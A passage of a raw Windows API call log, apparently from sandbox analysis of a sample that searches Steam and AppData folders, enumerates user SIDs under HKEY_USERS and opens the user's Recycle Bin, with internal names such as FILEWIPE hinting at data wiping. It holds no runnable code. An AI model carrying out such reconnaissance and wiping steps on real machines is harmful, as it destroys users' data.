(in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.813] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.814] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0199.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de808 [0199.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0a8 [0199.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0199.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0199.814] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\AppData", lpFindFileData=0x87f5a8 | out: lpFindFileData=0x87f5a8*(dwFileAttributes=0x8a019c, ftCreationTime.dwLowDateTime=0x8a0000, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x7738e36c, ftLastAccessTime.dwHighDateTime=0x7dc02d6, ftLastWriteTime.dwLowDateTime=0x46121, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x8a0000, dwReserved1=0x81202d7, cFileName="愡\x04", cAlternateFileName="")) returned 0xffffffff [0199.814] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.814] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.814] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0199.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b80 [0199.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de808 [0199.814] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0199.814] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0199.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0199.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd150 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2470 [0199.815] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2460 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd120 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2450 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd138 [0199.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exe", cchCount1=3, lpString2="|", cchCount2=1) returned 3 [0199.815] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2460 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2450 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd138 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2440 [0199.815] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd120 [0199.815] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\Steam\\steamapps\\common", lpFindFileData=0x87f078 | out: lpFindFileData=0x87f078*(dwFileAttributes=0x8a0194, ftCreationTime.dwLowDateTime=0x8a0000, ftCreationTime.dwHighDateTime=0x8a7648, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x1da00a2, ftLastWriteTime.dwLowDateTime=0x18429, ftLastWriteTime.dwHighDateTime=0x89fe58, nFileSizeHigh=0x773d1ecd, nFileSizeLow=0x7e8b71, dwReserved0=0xfffffffe, dwReserved1=0x1dc00a3, cFileName="萩\x01틨\x9b\x10", cAlternateFileName="")) returned 0xffffffff [0199.816] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0199.816] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0199.816] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0199.816] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0199.816] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2540 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a50 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0199.816] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2540 [0199.816] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0199.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d5a8 [0199.816] CharUpperBuffW (in: lpsz="HKEY_USERS", cchLength=0xa | out: lpsz="HKEY_USERS") returned 0xa [0199.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba150 [0199.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2470 [0199.817] RegOpenKeyExW (in: hKey=0x80000003, lpSubKey="", ulOptions=0x0, samDesired=0x20019, phkResult=0x87ef7c | out: phkResult=0x87ef7c*=0x80000003) returned 0x0 [0199.817] RegEnumKeyExW (in: hKey=0x80000003, dwIndex=0x0, lpName=0x87efc0, lpcchName=0x87ef80, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x87efb8 | out: lpName=".DEFAULT", lpcchName=0x87ef80, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x87efb8) returned 0x0 [0199.817] RegCloseKey (hKey=0x80000003) returned 0x0 [0199.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".DEFAULT", cchCount1=8, lpString2="S-1-5-21", cchCount2=8) returned 1 [0199.817] CharUpperBuffW (in: lpsz="HKEY_USERS", cchLength=0xa | out: lpsz="HKEY_USERS") returned 0xa [0199.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd318 [0199.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24d0 [0199.817] RegOpenKeyExW (in: hKey=0x80000003, lpSubKey="", ulOptions=0x0, samDesired=0x20019, phkResult=0x87ef7c | out: phkResult=0x87ef7c*=0x80000003) returned 0x0 [0199.818] RegEnumKeyExW (in: hKey=0x80000003, dwIndex=0x1, lpName=0x87efc0, lpcchName=0x87ef80, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x87efb8 | out: lpName="S-1-5-19", lpcchName=0x87ef80, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x87efb8) returned 0x0 [0199.818] RegCloseKey (hKey=0x80000003) returned 0x0 [0199.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S-1-5-19", cchCount1=8, lpString2="S-1-5-21", cchCount2=8) returned 1 [0199.818] CharUpperBuffW (in: lpsz="HKEY_USERS", cchLength=0xa | out: lpsz="HKEY_USERS") returned 0xa [0199.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba528 [0199.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24d0 [0199.818] RegOpenKeyExW (in: hKey=0x80000003, lpSubKey="", ulOptions=0x0, samDesired=0x20019, phkResult=0x87ef7c | out: phkResult=0x87ef7c*=0x80000003) returned 0x0 [0199.818] RegEnumKeyExW (in: hKey=0x80000003, dwIndex=0x2, lpName=0x87efc0, lpcchName=0x87ef80, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x87efb8 | out: lpName="S-1-5-20", lpcchName=0x87ef80, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x87efb8) returned 0x0 [0199.818] RegCloseKey (hKey=0x80000003) returned 0x0 [0199.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S-1-5-20", cchCount1=8, lpString2="S-1-5-21", cchCount2=8) returned 1 [0199.818] CharUpperBuffW (in: lpsz="HKEY_USERS", cchLength=0xa | out: lpsz="HKEY_USERS") returned 0xa [0199.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd300 [0199.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24d0 [0199.818] RegOpenKeyExW (in: hKey=0x80000003, lpSubKey="", ulOptions=0x0, samDesired=0x20019, phkResult=0x87ef7c | out: phkResult=0x87ef7c*=0x80000003) returned 0x0 [0199.818] RegEnumKeyExW (in: hKey=0x80000003, dwIndex=0x3, lpName=0x87efc0, lpcchName=0x87ef80, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x87efb8 | out: lpName="S-1-5-21-3388679973-3930757225-3770151564-1000", lpcchName=0x87ef80, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x87efb8) returned 0x0 [0199.818] RegCloseKey (hKey=0x80000003) returned 0x0 [0199.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S-1-5-21", cchCount1=8, lpString2="S-1-5-21", cchCount2=8) returned 2 [0199.818] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0199.819] FindFirstFileW (in: lpFileName="c:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpFindFileData=0x87f250 | out: lpFindFileData=0x87f250*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0x91d5a8 [0199.819] FindClose (in: hFindFile=0x91d5a8 | out: hFindFile=0x91d5a8) returned 1 [0199.819] CharLowerBuffW (in: lpsz="byte[0]", cchLength=0x7 | out: lpsz="byte[0]") returned 0x7 [0199.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0199.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd2e8 [0199.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a40 [0199.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd240 [0199.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2500 [0199.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd258 [0199.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24a0 [0199.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd1f8 [0199.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24b0 [0199.819] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0199.820] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0199.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfe8 [0199.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24e0 [0199.820] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0199.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfe8 [0199.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2450 [0199.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0199.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e24e0 [0199.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e24e0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0199.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24e0 | out: hHeap=0x8a0000) returned 1 [0199.820] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0199.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfe8 | out: hHeap=0x8a0000) returned 1 [0199.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2450 | out: hHeap=0x8a0000) returned 1 [0199.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0199.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2450 [0199.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24e0 [0199.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2440 [0199.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2450 | out: hHeap=0x8a0000) returned 1 [0199.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24e0 | out: hHeap=0x8a0000) returned 1 [0199.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2440 | out: hHeap=0x8a0000) returned 1 [0199.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0199.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2440 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfe8 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfd0 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd000 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd048 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24e0 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd048 | out: hHeap=0x8a0000) returned 1 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24e0 | out: hHeap=0x8a0000) returned 1 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd000 | out: hHeap=0x8a0000) returned 1 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd000 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd048 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfa0 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24e0 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfa0 | out: hHeap=0x8a0000) returned 1 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24e0 | out: hHeap=0x8a0000) returned 1 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd048 | out: hHeap=0x8a0000) returned 1 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd048 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfa0 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfb8 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24e0 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfb8 | out: hHeap=0x8a0000) returned 1 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24e0 | out: hHeap=0x8a0000) returned 1 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfa0 | out: hHeap=0x8a0000) returned 1 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfa0 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcfb8 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcf70 [0199.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24e0 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcf70 | out: hHeap=0x8a0000) returned 1 [0199.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24e0 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfb8 | out: hHeap=0x8a0000) returned 1 [0199.822] FreeLibrary (hLibModule=0x75c90000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24c0 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24f0 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2460 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea60 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2480 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd210 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd288 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd2b8 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd228 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd078 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd018 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd060 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0a8 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd090 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0c0 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0d8 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd108 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd120 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd0f0 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd138 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfd0 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd000 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd048 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfa0 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcfe8 | out: hHeap=0x8a0000) returned 1 [0199.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2440 | out: hHeap=0x8a0000) returned 1 [0199.823] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2440 [0199.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0199.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2480 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2480 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2440 | out: hHeap=0x8a0000) returned 1 [0199.823] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2440 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2440 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd1e0 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd1b0 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd2e8 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd1f8 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb28 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd270 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd1c8 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de128 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd258 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24d0 | out: hHeap=0x8a0000) returned 1 [0199.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2470 | out: 